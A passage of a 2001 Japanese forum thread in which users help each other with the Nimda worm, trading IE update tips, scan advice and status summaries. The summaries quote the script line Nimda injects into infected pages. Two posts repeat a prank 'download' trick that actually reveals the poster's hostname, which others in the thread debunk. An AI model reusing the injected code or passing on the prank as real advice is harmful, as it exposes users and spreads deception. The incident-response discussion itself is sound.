あとは自宅の個人PCなので・・・大丈夫かな。
ありがとうございましたヽ(´ー`)ノチョピリアンシン
780 :
:01/09/19 21:29 ID:cd9RQlRQ
ほんとだ。。。NHKでやってる
781 :
765さんじゃないけど :01/09/19 21:29 ID:wekcpjX.
McAfeeプレインストール版あるけどバージョン3なんです HPでは更新は終了みたいだし・・・。
782 :
:01/09/19 21:29 ID:lGJgt.CY
NHKでニュースやってる 財務省でも感染だとさ
784 :
:01/09/19 21:30 ID:LoP9L.6A
官公庁『が』被害とか、被害発見40件って…… 警視庁の能力ってこの程度なのか?<NHK
785 :
:01/09/19 21:31 ID:gzV2RVU2
国内の被害は40件とか言ってたけど、その10倍以上は 被害あるよね?
786 :
見るだけで感染、最悪ウイルス被害拡大 :01/09/19 21:31 ID:Ziuevdw2
787 :
:01/09/19 21:32 ID:plawXAu.
2chだけで40件以上のカキコを見たけど(w
788 :
:01/09/19 21:33 ID:6NApNFWk
40件どころの騒ぎじゃない。ウチの研究室にはウチの大学だけでも十数個の ホストから頻繁にアクセスしてるっちゅーねん。
>>785 100倍くらいはあるように思うのですが。気づいていないか被害届自体を出していないか・・
790 :
名無し :01/09/19 21:34 ID:ILBtY2o2
2chだけにいれば感染しないの?
791 :
781 :01/09/19 21:34 ID:wekcpjX.
それをアンインストールしても消せないんだよね・・・。 だからオンラインスキャンもできない・・・。
792 :
_ :01/09/19 21:35 ID:itG8WUNM
ie5.5sp2入れたらタスクスケジューラーがタスクバーから消えた。どーしよう。 そもそもタスクスケジューラーって何ですか?
>>791 きっとそれは必要なデータだけバックアップを取って再インストールしたほうが早いと思う・・
>>790 このスレにもあるけど、リンクを押さないように。
感染してるサイトに行ってしまうリンクが貼られているので。
794 :
名無し :01/09/19 21:36 ID:ILBtY2o2
どうも。
795 :
:01/09/19 21:37 ID:LoP9L.6A
>>792 定めた時間にアプリケーションを起動するその名の通りのスケジューラ。
使ってないなら意味ないから無視!
796 :
757 :01/09/19 21:39 ID:um1VlERs
>>767 nanasisan
レスありがとさんです、それに朝からご苦労様です
多分、nanasisanに救われた人は今日だけでも4桁を越えたでしょう
でも、やっぱり今日中に何とかしておかないと…
プリントアウト出来ないだけでも大騒ぎして業務が止まる人達なので。。。
まぁ、漏れも似たようなレベルですが(w
再インストールじゃなくて、再セットアップでも復帰しませんかね?
それか感染して削除したファイルを探して、健康なファイルに入れ替えとか?
ダメかなぁ… カエリタイ!
797 :
:01/09/19 21:39 ID:quvJiyn.
スキャンしたらload.exeってのが引っ掛かったんだけど、これってシステムファイルですか? 修復も出来ないし、あぼーんするしかなさそう。
798 :
747 :01/09/19 21:39 ID:MjPd0JhE
799 :
nanashi :01/09/19 21:39 ID:HFixfMC6
∧_∧ ♪ ( ´_ゝ`) まあ落ち着けよカスども 聞いてくださいkid rockで「Bawitaba」 / ̄ヽ/,― 、\ o 。。。 .:☆ | ||三∪●)三m三三Ε∃. + .:* \_.へ--イ | ゚ ゚ ゚ ♪. +:..♪.:。゚*.:.. / / | | .::. ☆。:.+::.. | .| | |☆:.°+ ☆.. : 。*.:☆゚x(_):。|_)*+゚。::.☆ο::.+。 *ρ♪.:.
800 :
680です :01/09/19 21:40 ID:P2IEeTiA
801 :
:01/09/19 21:42 ID:exuvAMjI
今ESPNのサイトみてたんだけど、エンコードがいつのいまにかトルコ語になってたんだよね。 これってなんだろ、今までトルコ語エンコードなんてしたことないのに・・・。
802 :
774 :01/09/19 21:43 ID:Rqrem/Gc
_____
/ .//‐|| ==
/∧_∧ || || / ̄ ̄ ̄ ̄ ̄
/( ´_ゝ`)||_|| <
>>799 ふーん
ぎゃあ!! / O⌒⊂ / \_____
∧_∧ / ̄ ̄ ̄ ̄/  ̄ =====
∩( ´_ゝ` | ̄ ̄ ̄ ̄||_ ====
\ ☆|□====□| __/ =====
\ (========)__
ドンッ! (_)`ー― `ー―
803 :
:01/09/19 21:43 ID:vArgEgZM
MSNコミュニティ(WEBスペース)は大丈夫?
>>796 > レスありがとさんです、それに朝からご苦労様です
いえいえ(__)
> プリントアウト出来ないだけでも大騒ぎして業務が止まる人達なので
業務を遂行するのと、セキュリティを守るのとどっちが大事なのかによると思います。
セキュリティを守るってことはユーザに対して一定の不便を強いてしまうことなのですから。
ウイルスをばらまいて企業の信頼を落とすのと、
業務を一時停止してお客さんに待ってもらうのと、
どっちが耐えられますか?ってことだと思います。
805 :
:01/09/19 21:44 ID:LoP9L.6A
>>801 エンコードミスは結構よくあること。
気にしたら負けさ!
>>803 コミュニティのページをいくつか見てみたけど、おそらく大丈夫と思われ。
心配ならIEのバージョンを上げましょう。
807 :
:01/09/19 21:46 ID:uIHq/q8o
808 :
792 :01/09/19 21:47 ID:itG8WUNM
>>807 とりあえず今回の問題*だけ*を回避するならそれでもかまわない。
ただ、それ以外にも問題があるので、できればバージョンアップ。
810 :
742 :01/09/19 21:48 ID:B1Z24eBE
>>742 です。
IE5.01SP2のバージョン情報は、5.01.****となるのでしょうか?
811 :
:01/09/19 21:49 ID:vArgEgZM
812 :
ん〜ま :01/09/19 21:49 ID:TWLvHZ.k
>>810 です。"SP2"が「更新バージョン」にあればOK。
814 :
:01/09/19 21:49 ID:kXOWfYUg
”Nimda”は”サーカム”と似た動作をしますが、 PC起動33分の1破壊モードや20分の1HDDあぼ〜んモードは ありますか? それと、マイドキュメントに入っている恥ずかしい写真が アドレス帳のリスト全員に送られてしまうのでしょうか? そうなると、人生があぼ〜んです。
とりあえず、チェックしたが感染は無し。 5.5+SP2にアップデートしようとしたけど、ビジーで途中でストップ。 みんなやってんだねぇ(;´Д`)
817 :
:01/09/19 21:51 ID:uIHq/q8o
>809 そうですか・・・何故かバージョンアップが出来ないようなので 今日はとりあえずこれだけ入れておきます。 あと、これを入れるとスクリプトを無効にしなくても大丈夫と言うことでしょうか?
>>817 今回の問題だけならば大丈夫だけど、できればバージョンアップが成功するまでは
スクリプト周りは切っておきましょう。安心の意味合いが強いですが。
819 :
:01/09/19 21:52 ID:exuvAMjI
>>814 対処方法としてはとりあえず、その写真をUPしてみそ。
820 :
810 :01/09/19 21:52 ID:B1Z24eBE
>>813 ありがとうございます。
30分以上かかったのにバージョン情報が5.00.3314、更新;;SP2;だったので、
慌ててました。
822 :
757 :01/09/19 21:54 ID:um1VlERs
>>804 nanasisan
>ウイルスをばらまいて企業の信頼を落とすのと、
>業務を一時停止してお客さんに待ってもらうのと、
>どっちが耐えられますか?ってことだと思います。
うう、まったくもってその通りです
でも、あの人達を説得する自信が無いなぁ,,,なんて思ってたら
とりあえずウイルス駆除&再セットアップ&プリンタドライバ再セットアップで
なんとか(表面上は)復帰したです
潜在的には多分、解決してないんでしょうね。。。
でも、症状が軽かった?かもしれんので、拡散防止をやれるだけやって
今日は帰ります!(Cドライプも開放してなかったし)
頑張って下さい!!>nanasisan
823 :
:01/09/19 21:55 ID:uIHq/q8o
>818 ありがとうございます。 明日CD-ROMをもらってきて頑張ってみます。
824 :
820 :01/09/19 21:56 ID:B1Z24eBE
あれっよく見たら、バージョン情報が5.01.****じゃないと ダメってこと? ガーーーーン
825 :
システム"管理"してる人 :01/09/19 21:56 ID:wYGc1z1A
は、落ち着かなくて今日眠れないっすね。 私は会社にいた時には知ってたけど、かなり軽視してた。 CODE RED対策は完璧だったので。 んで、今帰ってきてゆっくり2ch見てたら、どんどん鬱になってきた(ワラ ここまでヤバイものとは思ってなかったので、 なんの対策もしないで退社してしまって今非常に激しく鬱。 せめてインターネットの常時回線ぐらいは抜いて帰るべきだった。 明日出社するまでに何も無いことをひたすら祈る(鬱鬱 みなさんどうですか?
826 :
:01/09/19 21:57 ID:LoP9L.6A
悪い報告も出なくなったけど、ワクチンとかの良い報告も一向に出ないな…
>>822 ウイルスチェックの駆除で感染が取り除けていたら問題ないと思います。
ただ、駆除で稀に必要なファイルまで削除している可能性も捨てきれないので、
もしかしたら明日「うごかねーぞ」って呼び出される可能性があるかもしれません。
そのへんだけご注意を...
>>824 おおっ、見落としてました。少なくとも5.01でないとダメのようです...
>>825 > 明日出社するまでに何も無いことをひたすら祈る(鬱鬱
明日から1週間くらい旅に出ることを強くお勧めします(藁
もちろん携帯電話もPHSもインターネットメールも繋がらない場所に。
829 :
! :01/09/19 22:00 ID:BYEyAkxw
2ちゃんの引き篭もり、高給でやとえばいいのになあ、対策やってるお役所は。
>>829 ワシも出来れば雇いたいな・・(「出来れば」だけど)
紹介できる先はいくらでもあるぞ・・・
831 :
:01/09/19 22:03 ID:P53JBYco
832 :
824 :01/09/19 22:05 ID:B1Z24eBE
>>831 フォローありがとうです、、
そろそろ疲れてきてるのかな、間違いまくりで済まぬですm(__)m
834 :
824 :01/09/19 22:06 ID:B1Z24eBE
835 :
:01/09/19 22:06 ID:W2wzRDWw
昨日、5.5SP2にアップデートしてから終了しました。 さっき立ち上げてからしばらくしたら、 Microsoftの「重要な更新して下さい」が出たので Windowsサイトを見に行ってみると、前に更新した (更新履歴でもインストール済みになってる) 「セキュリティ問題の修正プログラム 2001年4月2日」が 更新されてないよ!って出てきたのですが、なぜなのでしょうか? 再ダウンロードすべきなんでしょうか?
>>835 IEのバージョンを上げたら修正プログラムが入っていない状態に戻ってしまったということ?
とりあえず再ダウンロードして適用しましょう。
IE5.5SP2では適用されていなかった修正なのではないかと。
837 :
:01/09/19 22:09 ID:P53JBYco
>>833 頼りにしています。がんばってください。
5.01といいながらバージョン番号を揃えないMS
が諸悪の根源。
838 :
:01/09/19 22:10 ID:RnSH4/E2
MSNのwindows up dateサイトで、いくらやっても「不明なエラーでインストールできませんでした」とでます。 IE5.5+SP2をDLしようとしてるんですが、いま混んでるんでしょーか??
>>838 インストール時にはウイルスチェックをいったんOFFにしないといけないかも。
あと、インターネットオプションのActiveXのセキュリティ設定も要確認。
841 :
751 :01/09/19 22:14 ID:celyGT2I
842 :
835 :01/09/19 22:18 ID:W2wzRDWw
>>836 nanasisan
ありがとうございます。
今は混んでるのかダウンロードが
ストップしてしまったので後でやろうと思います。
843 :
:01/09/19 22:19 ID:uIHq/q8o
IEのセキュリティの設定を「高」にするのと レベルのカスタマイズで色々設定するのとどっちが良いのですか? とりあえず「スクリプト」が無効になっていれば大丈夫?
844 :
ウィルスf :01/09/19 22:19 ID:cONzbF9s
845 :
:01/09/19 22:21 ID:xrrEreS.
高にしたらクッキー無効にならないっけ? 書き込みできないよ。個々に設定した方がいいと思う。
>>843 スクリプトまわりが「無効」になっていれば問題ないでしょう。
ただし、IEの古いバージョンだと「無効」が無視される問題もあったような気がしますので過信せぬよう・・・
847 :
テレホ :01/09/19 22:22 ID:k3oIsIQw
テレホタイムはどうなるんだぁしょうなぁ。MSN
>>747 トレンドマイクロのサイト全体がパンク寸前。
>>847 あと30分程か・・夜勤★氏の話だと今現在もテレホーダイタイムでの混雑は酷い
らしいので、今回のウイルスも広がりまくる可能性が否定できないなぁ...
850 :
:01/09/19 22:24 ID:uIHq/q8o
>845−846 レスありがとう。
851 :
:01/09/19 22:25 ID:P/uHVhD2
今日、ウイルスが実際に届きました。バカみたいに「このファイルを 落として実行してみます?」と聞くのが笑えた。 早速殺しましたけど。
852 :
:01/09/19 22:26 ID:MDwVX.qw
まあ、トレンドマイクロに入れないなら このことには関係ないがファイアーウォール もついでに入れとけ。
853 :
:01/09/19 22:26 ID:0AcMkOX6
このスレで今日半日お世話になったものです。すごく感謝しています。 また来て、感動した。涙出そう。 プロジェクトXをリアルタイムで生体験できた気分だ! 本当にスゴイ。
854 :
:01/09/19 22:27 ID:d/7aZE/g
スクリプト、ジャバ関係はほとんど無効にした。カキコできる範囲で。 テレホで一気に広がるだろうな。
855 :
_ :01/09/19 22:29 ID:C5v7dHUI
SP2にするためにie5setup.exeをダウンロードしてきて、 実行しましたが、タスクの署名とか言う所でインストールが終了してしまい、 インストールできません。どうすればいいでしょう?
>>855 「タスクスケジューラ」の問題かな。とりあえず無視して問題ないはず。
再起動後、ヘルプ->バージョン情報でバージョンを確認してくだされ・・
857 :
:01/09/19 22:30 ID:4YJKdDT.
JNBのログイン画面にアクセス出来ないのですが、これって javascriptとActiveXをオフにしたせいでしょうか?
858 :
マターリネット :01/09/19 22:30 ID:D3sF25rg
ドリカスはウイルス騒動もカヤの外・・・
859 :
感染爆発 :01/09/19 22:32 ID:k3oIsIQw
30分前〜。 テレホ接続の人々ネットにつなぐ。 ↓ MSN、ウィルスソフトサイト混雑。 ↓ つながんねー後でいっか。 ↓ ちゃんちゃん
>>857 JNBって? jnb.co.jp で良いのかな?
該当ページを見てみたけど、トップページからいきなりMacromedia Flashでした。
従って、ActiveXは少なくともONにしないといけないでしょう。
861 :
855 :01/09/19 22:32 ID:C5v7dHUI
>>856 再起動したんですが、更新バージョンがSP1のままなんですよ。
どうすれば・・
862 :
:01/09/19 22:34 ID:nbj3zvbY
ぴゅう太でよかったヽ(´ー`)ノ
>>861 とりあえずインストール時に行うべきこと。
(1) ウイルススキャンは一時的に止める
(2) タスクスケジューラも止める
(3) どうしてもダメなら明日まで待って素直にIE5.5SP2の入った雑誌やプロバイダの販促用CDをもらうor買う
が良いでしょう。
864 :
:01/09/19 22:35 ID:4YJKdDT.
>>860 ジャパン・ネット・バンクのログイン(取引)メニューのことです。
紛らわしくてごめんなさい!
865 :
:01/09/19 22:35 ID:d3VTxE7E
867 :
:01/09/19 22:36 ID:.n2DOLYc
>>865 IE5.5SP2とかIE6では「ダウンロードしますか?」って出てくるのでそこでキャンセルすれば良い。
それ以前だとそれすら出てこないので問題なのです、、、
869 :
ななし :01/09/19 22:36 ID:HqLwJMxQ
IEはウィルスだと聞いたことがあります。 IEのインストール方法をネットに記述することは犯罪ではないのですか?
870 :
:01/09/19 22:37 ID:TbNi7sXg
>863 CDからだと大丈夫なこともあるんですか?
871 :
@@ :01/09/19 22:38 ID:PL8pJIzE
すまぬが誰か今までのベストの対処方法をまとめていただけませんか? テレ穂タイムまでじかんがないので! お願いします! 全部読んでいる暇がありませんです(泣
872 :
nanao :01/09/19 22:38 ID:cuInItTs
今手元にそのウィルスがあるのですが、 テキストにしてここに貼ったらダメですよね? MSN以外を見てて、感染しそうになったのは 漏れだけなんですか?
873 :
:01/09/19 22:39 ID:qcJ.YKJs
v5.5用sp2・・・8Mダウンロードに3分だった。ADSLのヨサを初めて実感・・・
874 :
:01/09/19 22:40 ID:4YJKdDT.
>>871 (1) IEのバージョンアップ
(2) 全てのファイルに対してウイルススキャン
(3) 心配ならスクリプトまわりをOFF
876 :
:01/09/19 22:40 ID:cuInItTs
877 :
:01/09/19 22:40 ID:kCJe70A6
/■■■■■\ / ■■■■■ .\ / ■■■■■ .\ / ■■■■■ .\_ .r'゙ i゙'' l __ i l :,,r''' ̄ ゙゙゙゙゙̄''''''''''''-,,_ i i ;ri!゙ ゙lll;;, i '| ;lll|l ,,,,:;iiii;,,,, ,,,;;lllii;_ 'll|l | .'l, レll'l ''' ,,,,, ̄ ,,,,,___ l|ト,r '|;i|'ト :r:'llll'' ゙゙'ill⌒ l ゙.r''' .l ゙ト i .| 'l .| :r'゙ /' ! \ l | _______ .ll,,) '|!,,, .(i;;;;;iiilllii;il)l;':: ,r''| li,,,l / |l;,'l||ll!|lll'llllllllllllllllll,'! ||l| ll |!゙ < おにぎりワショーイ! | i‐:リlト:,::;;;;;;;;;;;;;;,,,:l lil ´l!|.;|l゙ \ by ラディソ '!:ト)' 'li, iiiiiiiiiiiii'.、l.`ll,,|:(` |  ̄ ̄ ̄ ̄ ̄ ̄ ̄ l|!`r,.('ト.r i l゙ i |. )゙l! | i'!.'il、.'l; .| i'l l. ; l,i,'!!'l;゙;; '|゙ ゙ 'l;;;l'llll :ili;|.フ/; ,`ト.゙;l!. ;l i;''ll!|_ |_ li,, !,,l'!.lレi!ト ト .l|l、.lli;l!i'''!,、 r l!(./ ゙' '!゙゙ llレ|l,.;i,i;| ;ー.゙ ゙liト !:!
878 :
:01/09/19 22:41 ID:d3VTxE7E
>>868 ど〜も。
「ダウンロードしますか?」が出てくる前にノートン先生が反応しまくってビックリしましたよ。
879 :
:01/09/19 22:41 ID:xrrEreS.
時間がない奴、分からん奴、ネタじゃなくネスケを入れとけ。
>>874 httpsのproxyを設定してるか、https自体無効にしてない?
一度設定回りを確認し直した方がよい。
881 :
:01/09/19 22:42 ID:LjR.bp4A
IE5.5SP2にしたしJavaScriptも切ってあるけど、
>>865 に
行く勇気がない・・・・
でも、行ってみたい・・・・
882 :
ういるす :01/09/19 22:43 ID:k3oIsIQw
ウィルス対策ソフトなんて、ヘビーユーザーしか 入れてない気がする。そんなことないすかねぇ?
883 :
:01/09/19 22:44 ID:ALUfLgrg
逆に最近はヘビーユーザじゃなくてもネットやったりしてるしね。
884 :
:01/09/19 22:44 ID:P53JBYco
885 :
:01/09/19 22:45 ID:dw2qn0j.
>882 出掛ける時も家に鍵をかけない田舎の人間みたいなこというなよ。
886 :
ぺ ◆lPYiMAEY :01/09/19 22:46 ID:1xVp6UNk
>882 あまい
887 :
定期コピ :01/09/19 22:46 ID:LNEMDmj.
状況報告ver1.05(前編) 対策 1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする 2.それでもダイアログは開くので、覚えのないファイルはDLしない。 3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ →java関連とダウンロードのファイルのダウンロードを不許可。 現在わかっている影響 1.メールによるウイルスファイルの頒布 2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。 3.バックドアを開き、クライアントを丸裸にする。 4.大量の*.emlファイルを量産する。 5.感染したPCはCドライブをネットワーク共有する。 6.システムのスローダウン 7.リソースの消耗 8.他のファイルに潜伏する。 メールによる接触時 ウィルス感染したメールを受信したとき、readme.exe はwav(音声)ファイルになりすます。 LANによる感染 社内に一人でも対策してないひとがいてノーパスとかにしていた場合 LANの共有フォルダを使っても自己増殖する。 感染鯖 ソースの最後に<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html> が追加される。
888 :
名無しさん :01/09/19 22:47 ID:lVEmuQHY
MSNウイルスから完全にCPUを守るソフトをダウンロードできるサイトがあります。
ただし特殊なソフトにつき普通にリンクを張ることはできません。
ダウンロードの方法は
1.書き込みの名前の欄に
http://fusianasan.2ch.net/ と入れる。(裏ドメイン名)
2.E-mail欄に、msn virus killerと入力する。(ログオン)
3.本文に「ウイルス 逝ってよし」を入れて(パスワード)、書込みボタンを押します。
4.タイトルが「ウイルスバスターダウンロード」に変わればOK!
5.サーバーが重いと2chに戻ってくるけど、くじけずに何度も挑戦!
。
うまく行くと、目的のページにつながります。
6.家庭の電話回線よりも、企業や学校の専用回線からの方がサーバートラフィックの
都合上つながる確立が高いです。
(注意!)全て半角で入れること!!
23:00〜03:00の間はつながり難いです!何度もトライ!
http://fusianasan.2ch.net/ ←は、裏ドメインの為「直リン」で飛んでも
「鯖が見つかりません」になります。入り口は「表2ch」のCGIだけです。
889 :
:01/09/19 22:47 ID:cuInItTs
890 :
定期コピ2 :01/09/19 22:47 ID:LNEMDmj.
状況報告ver1.05(後編)
感染の有無の確認
1.●トレンドマイクロ オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm 2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
*.emlが大量にHITした際は確定。
ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
そうでないときは後者2個を削除して様子を見る。
といっても後者二つを消したからウイルスが消えるわけではない。
ファイルのDLを拒否してもファイルが作成されたという報告
(多分一時ファイルに残っているだけだろうが)があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする(らしい)
感染時の対応
感染してしまった後は、アップデートしても無意味。
とりあえず感染を拡大しないようにウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテンツを回らない。
感染前に対応ブラウザにして、DL拒否しているのにスキャンで
感染しているというときは多分『インターネット一時ファイル』
に残っているので、気になるならツール→インターネットオプション→
全般→インターネット一時ファイル→ファイルの削除
ワクチンできたよとかの情報など、追加のフォローさらに宜しく!>ALL
>>888 は嘘です。信じてはいけません :-)
ホスト名が晒されてしまいます。
892 :
:01/09/19 22:48 ID:fE4h2VAs
プロバイダが無料で配布しているCDに入っている インターネットエクスプローラーはSP2なんでしょうか?
893 :
:01/09/19 22:48 ID:XTAHDm5.
>>892 それはプロバイダにもよるし、配布時期にもよります。
CD-ROMのどこかにドキュメントがあると思うので、それを参照しましょう。
895 :
:01/09/19 22:53 ID:d/7aZE/g
896 :
:01/09/19 22:54 ID:fE4h2VAs
>>892 ありがとうございます。
雑誌に付録されているCDでSP2のバージョンが入っている
ものはないんでしょうか?
友人がみんなダイヤルアップ接続のため、Windowsupdateは
使えそうにないのです。
897 :
:01/09/19 22:54 ID:gxgcJyr2
セキュリティ問題の修正プログラム ってのはダウンロードしなきゃならないん ですかね。当方IE5.5SP2をインストしたばかりです。
898 :
名無しさん23 :01/09/19 22:55 ID:nOf06Vs2
899 :
:01/09/19 22:56 ID:KpBT27lU
900 :
ういるす :01/09/19 22:57 ID:k3oIsIQw
スーパー初心者さんたちは、 ヘブライ語サポート、 アラビア語サポートなんかも、勢いで落としそうな予感
901 :
ぺ ◆lPYiMAEY :01/09/19 22:57 ID:1xVp6UNk
CD-ROMが欲しいという人は、明日まで待たなくても 今すぐにコンビニに逝けばいいんじゃないかい? 最近はどこでもパソコン関係の雑誌がおいてあるし、 添付のCD-ROMにSP2が入っているのもあると思われ。
>>897 入れた方がよいです。はい。
>>896 店頭で探してみることをお勧めします。そんなに苦労なく見つけられると
思いますので。。。
903 :
:01/09/19 22:57 ID:LjR.bp4A
904 :
nanasin :01/09/19 22:57 ID:5ulH0vA6
感染してからバックアップとったんですけど そのバックアップとったCD見てみたら例のdesktop.emlファイルが各フォルダ毎に1個ずつ入ってました。 これは他のファイルにも感染してて、 違うマシンでこのCDに入ってるファイルを使ったら感染してしまうってことなんでしょうか?
905 :
:01/09/19 22:57 ID:dIGqV/Eg
今日IE5.5SP2をインストールしたんだけど KERNELエラーが出まくりで何度再起動してることか・・・ これってインストールの失敗?ウィルス?
906 :
:01/09/19 22:58 ID:j/NE2af2
>>865 リンク先からreadme.emlを入手できました。
ありがとう。
907 :
897 :01/09/19 22:59 ID:gxgcJyr2
>>899 >>902 レスありがとうございます。しかし無茶苦茶重いですね。
で、DL残りあと数KBから動かないんですけど・・・。
待つしかないんでしょうか。
>>904 おそらくはその通り。本当に必要のあるファイル(できれば.jpgとか.gifとか
.txtとかのようにマクロやスクリプトが埋め込まれないものが良い)だけを
バックアップしたほうがよいとおもう。
909 :
_ :01/09/19 22:59 ID:T.W/lyRg
>>878 おれも見に行ったけど突然ノートン君のレッド画面が!!
ちなみにIE5.5SP2。その後ダウンロードの画面が出たので「キャンセル」。
ブラクラよりたち悪い。おもしろ半分で見に行くのはダメダメ!!
910 :
ぺ ◆lPYiMAEY :01/09/19 23:01 ID:1xVp6UNk
>897 すでにSP2にアップデートしてるのに、古い「重要な更新」 が表示されるっていうパターンかい? SP2のリリースは今年の8月、重要な更新は4月頃でしょ? おかしな話だよね。 だから漏れはその更新のアップデートは推奨しない。
911 :
:01/09/19 23:01 ID:fE4h2VAs
912 :
:01/09/19 23:01 ID:BOsPTvFw
MSNってなんて読むの? そのまま?
913 :
:01/09/19 23:03 ID:fCT4aGVk
財務省もかよ!!!
914 :
これは? :01/09/19 23:05 ID:40eT3zvM
件名:README 本文:Hi! How are you? I send you this file in order to have your advice See you later. Thanks 添付ファイル:README.doc.com、ATT00070.txt こんなのがメールに来たけどこれもこの関係のウィルス?┐('〜`;)┌
915 :
名無しなのか? :01/09/19 23:09 ID:qoiB.8o2
>>914 別件と思われ。まず間違いなくウイルスでしょ。
>>910 IE5.5の開発プロジェクトと5.0のパッチの開発プロジェクトが別々だっていう
こともある(UNIX系では「ブランチ」といったりする)ので、適用したほうが
間違いないかと。
917 :
:01/09/19 23:09 ID:P53JBYco
>>912 「えむえすえぬ」で良いはず。"MicroSoft Network" の略。
919 :
nanasin :01/09/19 23:10 ID:5ulH0vA6
>>908 やっぱりそうなんですか・・・
どうしよう・・・
920 :
:01/09/19 23:11 ID:LEiRPEVk
ブラウザの立ち上げに異常なほど時間がかかるんですが、ヤバイですか? 修正ファイル落とすのすら満足にできない。
nanasisanの献身的レス、感動!
922 :
名無しなのか? :01/09/19 23:12 ID:qoiB.8o2
>>921 同意!ほんと、すばらしいですね。尊敬します!
がんばれ!nanasisan!
923 :
:01/09/19 23:12 ID:P53JBYco
nanasisan、ありがとうございます! だれかパート2たててください
>>919 とりあえずCD-ROM(CD-Rかな?)に対して全部のファイルをウイルスチェック。
もちろん最新のパターンファイルで。
引っかからないようなら安心して良い。
925 :
:01/09/19 23:14 ID:fCT4aGVk
パート2いるの?過去ログ読めば十分じゃん。 甘えすぎ。甘えすぎ。甘えすぎ。
>>925 いちおう立てておいた方が「IEで感染してしまいました」スレが乱立しかねない
状況を考えれば良い考えかと。
927 :
:01/09/19 23:16 ID:.xFBTiXw
928 :
名無しさん :01/09/19 23:16 ID:lVEmuQHY
MSNウイルスから完全にCPUを守るソフトをダウンロードできるサイトがあります。
ただし特殊なソフトにつき普通にリンクを張ることはできません。
ダウンロードの方法は
1.書き込みの名前の欄に
http://fusianasan.2ch.net/ と入れる。(裏ドメイン名)
2.E-mail欄に、msn virus killerと入力する。(ログオン)
3.本文に「ウイルス 逝ってよし」を入れて(パスワード)、書込みボタンを押します。
4.タイトルが「ウイルスバスターダウンロード」に変わればOK!
5.サーバーが重いと2chに戻ってくるけど、くじけずに何度も挑戦!
。
うまく行くと、目的のページにつながります。
6.家庭の電話回線よりも、企業や学校の専用回線からの方がサーバートラフィックの
都合上つながる確立が高いです。
(注意!)全て半角で入れること!!
23:00〜03:00の間はつながり難いです!何度もトライ!
http://fusianasan.2ch.net/ ←は、裏ドメインの為「直リン」で飛んでも
「鯖が見つかりません」になります。入り口は「表2ch」のCGIだけです。
929 :
ばぼ :01/09/19 23:17 ID:hWh68ZQA
MSXでよかったヽ(´ー`)ノ
>>928 しつこいのぉ。fusianasanじゃホスト名が晒されてしまうぞ・・
931 :
いつかの510 :01/09/19 23:17 ID:Ouhz3Z.c
nanasisan!ずうっと寝てないよねやっぱ? しかも、このレスの多さ。スゲェヨYO!!
932 :
:01/09/19 23:17 ID:LNnu/xFs
ワクチンソフトって、CPUの石を守るのか(ワラ だいたい、特殊だから普通にリンクをはれないって、 リファラがあるとはじくのか。 しかもパスワードが全角文字かよ…。
933 :
:01/09/19 23:18 ID:gSG9bUGY
ダウンロードはじめたはいいんだけど残り24秒になってから既に2時間が経過。 どうなってんだ?
935 :
:01/09/19 23:18 ID:LreNpxz2
マイクロソフトのサイトが非常に重い。 2chで宣伝すると、DDoS攻撃に匹敵する破壊力になってしまうよ。
おっさんは明日以降にするわ。DL。
937 :
:01/09/19 23:18 ID:aOohb38.
>>929 確かにMSXには感染しないね
最強のMS製品じゃない?
938 :
初心者 :01/09/19 23:19 ID:Gad5gis6
ログを拾い読みしただけなので、既出かもしれないけれど・・ SP2を入れてから、O.Eの画面が消えてしまいました。 O.Eも何かしないといけないのでしょうか? ちなみに、ツールバーは生きてます
939 :
いつかの510 :01/09/19 23:20 ID:Ouhz3Z.c
申し訳ない。そろそろ寝ることにするよ・・・ きっと深夜は深夜で別の方が助けてくれるだろうことを信じつつ・・・。
941 :
FBI :01/09/19 23:21 ID:LGJz.nhI
_人 ノ⌒ 丿 _/ ::( / :::::::\ ( :::::::;;;;;;;)_ \_―― ̄ ̄::::::::::\ 1000狙います!! \ ノ ̄ ::::::::::::::::::::::) / \( ::::::::::::::;;;;;;;;;;;;人/ / ̄――――― ̄ ̄::::::::\ ( ● \__/::●:::::::::::::) .\__::::::::::\/;;;;;;;;;;;;;;;;;;;;;;ノ
942 :
いつかの510 :01/09/19 23:22 ID:Ouhz3Z.c
>>934 寝てもいいじゃない?
ほぼネタはがいしゅつでしょ。
そこまで、厨房に付き合わなくといいと思うよ。
943 :
:01/09/19 23:23 ID:8.qwgzrY
ふ〜〜〜〜。 やっと全部読み終わったYO! 感染してなかったYO! 心配な奴はとりあえず全部読め!! >nanasisan ほんとにありがとうございます!!!!
944 :
:01/09/19 23:23 ID:0M9tObJg
nanasisanさん、ありがとうございました。 今日はお疲れ様でした。ごゆっくりお休みください。
945 :
初心者 :01/09/19 23:23 ID:z1v8RI5o
nanasisanお疲れでした。 助かりました。
946 :
いつかの510 :01/09/19 23:23 ID:Ouhz3Z.c
947 :
:01/09/19 23:24 ID:ZaN1BBPg
この時期、半角板に逝くのは タイに行く位危ないでしょうか?
948 :
じゃ、1000取り前に :01/09/19 23:25 ID:yZ87i7kI
状況報告ver1.06(前編) 対策 1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする 2.それでもダイアログは開くので、覚えのないファイルはDLしない。 3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ →java関連とダウンロードのファイルのダウンロードを不許可。 ダウンロードの不許可は保険の保険なので、必要ない人には必要なし。 現在わかっている影響 1.メールによるウイルスファイルの頒布 2.WEBコンテンツ閲覧時にそのサーバにパケットを送り攻撃、感染する。 3.バックドアを開き、クライアントを丸裸にする。 4.大量の*.emlファイルを量産する。 5.感染したPCはCドライブをネットワーク共有する。 6.システムのスローダウン 7.リソースの消耗 8.他のファイルに潜伏する。 メールによる接触時 ウィルス感染したメールを受信したとき、readme.exe はwav(音声)ファイルになりすます。 LANによる感染 社内に一人でも対策してないひとがいてノーパスとかにしていた場合 LANの共有フォルダを使っても自己増殖する。 感染鯖 ソースの最後に<html><script language="JavaScript">window.open("readme.eml", null, 